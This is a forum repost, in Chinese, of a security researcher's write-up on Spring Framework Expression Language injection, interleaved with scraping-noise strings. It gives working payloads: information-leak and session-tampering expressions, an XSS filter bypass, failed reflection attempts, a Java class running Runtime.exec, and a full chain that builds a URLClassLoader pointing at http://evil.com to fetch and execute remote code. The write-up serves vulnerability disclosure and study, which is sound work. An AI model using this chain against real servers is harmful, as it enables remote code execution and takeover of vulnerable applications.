中国网络渗透测试联盟
标题:
spring-远程代码注入
[打印本页]
作者:
admin
时间:
2013-2-16 21:47
标题:
spring-远程代码注入
Remote Code with
% a- l, d3 Z& H3 t- D4 {- }
Expression Language Injection
* x% K! k. t% q9 V$ R8 h
Spring Framework脆弱性—DanAmodio
7 \$ d, t @5 D) E+ n/ @
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
$ z* j8 ^- t% }
可能会存在风险。
8 ~6 t% R" M9 ~4 e
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的
5 _) F0 _& X8 U/ |' q' V( o2 m
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可
9 ^7 i/ t' J, B( v3 h$ ^2 A
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
# k" E% K( ^. T; x: K3 M
以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
/ y! X5 g$ o$ M
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
+ }5 A( C- u% U8 a5 D( w0 P
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
: m% ?2 n0 ]1 u* D7 L! ]' G8 X; Z
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版
% @8 m& u* Z |# a: }% }3 |2 S
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
4 W0 x; O9 G4 F# }8 ?6 S
这些版本不支持禁用double EL resolution.
" Y- {6 N* s. Y# u7 ~7 A8 e6 o2 {
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含
5 J3 j/ E& A& Y) L
EL2.2容器上可能进行远程代码执行。
$ y: f, u) r' a @! g" D3 G$ C& n
这是一个原始信息泄露的攻击例子:
: l3 @$ d2 x) x# }" X l% o4 f& y, ?
请求:
# ]2 ]7 |: t( J1 _4 b0 l
ttp://vulnerable.com/foo?message=${applicationScope}
$ s6 Z% D5 H( N5 O7 c* u
到达以下内容页面:
_+ |" X% q& j) D A
结果将输出一些包含内部服务器信息calsspath 和本地工作目录
0 x# p I% y0 [+ N- A; W3 \+ L
你也可以做一些其他事情,如这样:
3 m# v. R! e- @ n
${9999+1}
8 S/ m! R/ B3 H$ f3 }4 S
还可以访问session 对象和beans
1 ]) X2 p0 a6 ?) v9 Y
${employee.lastName}
: G+ ^8 `! C8 A3 J% [+ w
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
0 o2 A; R) x$ f) B
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
" |' W1 S' J4 n
西,比如XSS.
. c/ H+ I" q9 I9 \- P1 E+ z
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签
( C8 ]% r; ]- g- {
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
. d- t7 G4 P2 s' q" q
呢?”
3 C& A9 m# e% }5 m
因此,我尝试巳缦拢�
$ N! j8 {7 P; \
http://vulnerable.com/app?code=
${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
, Z1 `, d/ @. N* N
P
( g# y# F; p) J" N( @0 | L
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
2 r9 l. l |9 d+ c: }6 L: e- u
回的文本被插入进了spring:message 标签。
9 |* q( \6 V) ?& H/ [! C$ ~3 s% H
这里是一个最终绕过过滤的实例:
; y) _% N: J( B* X4 s
http://vulnerable.com/app?code=
${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1)
/scriptQ
g/ E! s3 Y( M, T. h
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
9 O& O2 @; v; N S
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
8 F9 ~# p$ s- r- _
经过一番研究,我学习到EL2.2 增加了方法调用。
% h' W9 y( m9 y6 H6 q
我写了一个快速测试应用程序代码并且检测一些功能
/ e; M: D! c* j8 l% o3 j
${pageContext.request.getSession().setAttribute(“account”,”123456″)}
/ `: i# t) D, ~
${pageContext.request.getSession().setAttribute(“admin”,true)}
0 L! _" h/ Q4 Y- p+ J
好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
5 R+ @! J6 R: P( d# ?4 P# l
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
0 U+ h- W. a; l l9 R$ i5 B
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
2 b) b! L1 r( i8 b8 J& q5 [
“, 1234)}
$ l' J: D2 R8 ^
${“”.getClass().forName(“java.lang.Runtime”)}
& Y3 a" | B- {, z
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不
9 C4 B6 |" R/ J2 Z8 ^( V Q( r0 O
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
7 J( |9 i: ~$ v% I0 h$ L
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有
3 d) I) ?5 ]8 m: }; r
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
0 ?/ r6 L5 l7 A( U2 w4 w( i h) Y
方法签名invoke(Object obj, Object„ args)
6 `2 T% M6 f [1 {# u5 e6 U5 M
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
6 w5 n3 D. @( R/ x
题,以让它可以工作起来。
# @. V. L9 {' l& I1 ]: |
漏洞利用:
) A0 G6 X) z3 G$ U
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
3 s. {/ k7 L$ w/ _/ p
希望你们中的一些JAVA奇才告诉我我是如此的可笑。
( Y+ Y" c/ D# z$ N
这里有一些我试过的失败的用例,为了试图让它工作的用例:
* {# M1 c8 W% f- n7 G! _
写文件到文件系统
4 y2 g, Q" l% C* v& O) _
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
0 u( |7 ~5 E0 N1 B
我认为这些可以很好的工作,但是我不能找到合适的类来载入。
6 `$ }4 X: Y6 R. e
${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
+ q* ]7 a7 ?3 ^6 j* J2 y: ~- l
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
E( d! f4 @0 w; D p0 I
org.springframework.expression.spel.standard.SpelExpressionParser not found
* e' ^6 k7 g Q/ Q
by
- ]# w3 H1 o" R# m
org.glassfish.web.javax.servlet.jsp [194].
" c- }1 D3 Z6 W: C, S" L
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
2 W( Z* h; f* y% l
利用反射来创建一个新的Runtime(and watch the world burn)
5 W9 _$ b6 k* G: h
${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
/ [0 y- O- o% T1 |
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
4 O! p2 R% [7 d+ d& p
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
: H# F$ L) V8 i* U
使用java.lang.ProcessBuilder
3 {) e4 _# }* r. e4 W$ `
用表达式语言来评估表达式语言
5 e; V# L3 W% @, v* x- I0 \$ K4 J
Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
4 N$ m9 k3 p9 J: K
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request
9 k; M$ v5 h0 y
“,”".getClass(),null)}
1 H# H6 L. f3 y9 o; r7 _0 T) u
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
/ \2 ~5 {5 I3 Y$ ?2 A; r6 t9 A
我在使用一个空数组通过Method.invoke()时失败了很多次
1 Z Z; A2 e9 Q* U9 C2 ?
“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
+ ]. ], q3 Q/ R, A) V
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
! `* A3 R4 P2 r$ |
rrayList”).newInstance().toArray())
' H4 `' N* B: X' z
java.lang.IllegalArgumentException: wrong number of arguments
7 ~) W$ G- d6 F3 V2 k
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
* C% U: g- w" D2 Q) ?5 R# A7 k/ h
以创建一个恶意class文件并且指向类装载器.
! [6 y# g5 m/ B3 S
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
* X; H6 n/ I; N
public class Malicious {
: V9 g. y8 U3 Y' G- x. X* J
public Malicious() {
& L/ j9 B/ Q; `* s; r
try {
$ P: n+ m- m$ q" Q9 z0 b2 H' n$ j
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
) ~* C# i8 Y& S
java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
. R3 L2 \* q% ~# l; Y$ A
} catch (Exception e) {
* q1 r6 l+ z( s- @$ |$ q
}
7 F$ k; d' @$ B$ D
}
, U" R; i: @ ~: B- ~
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
: K4 x9 G! F3 U% c$ E8 { Y
话中,因此它可以被使用.
. J+ J3 C8 r7 `4 Q! P
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName
3 d3 c( k0 a& w3 l4 w
(“java.util.ArrayList”).newInstance())}
2 ?0 C) e. v, y' v- h/ ~+ U
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
; @. A( g$ d; b* G! n
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
0 [8 ]9 o& W7 c
getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个
7 _4 l2 p* ^- w1 A2 v1 Y1 `
我们可以调用的create(string)方法,然后转换对一个URL对象。
) a. Y" c8 ?4 O6 c% E- b5 [
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“
http://evil.com/path/to/wh
7 C: q& u8 ?- Q) D1 r" e
ere/malicious/classfile/is/located/”).toURL())}
# Z; S. o6 V) d9 X( s1 P
然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
( Z' F! j, Z6 N8 p: k
恶意类文件被装载并创建,触发远程代码.
9 Y0 _: ]9 V- i' l( @
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte
4 S* o9 Y. z0 E. g
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
/ Q3 c* q3 Q0 q1 b8 X8 Y/ h3 v
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance
/ W4 i8 e% Q& X% s% A+ }0 E
()}
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2
/scriptQ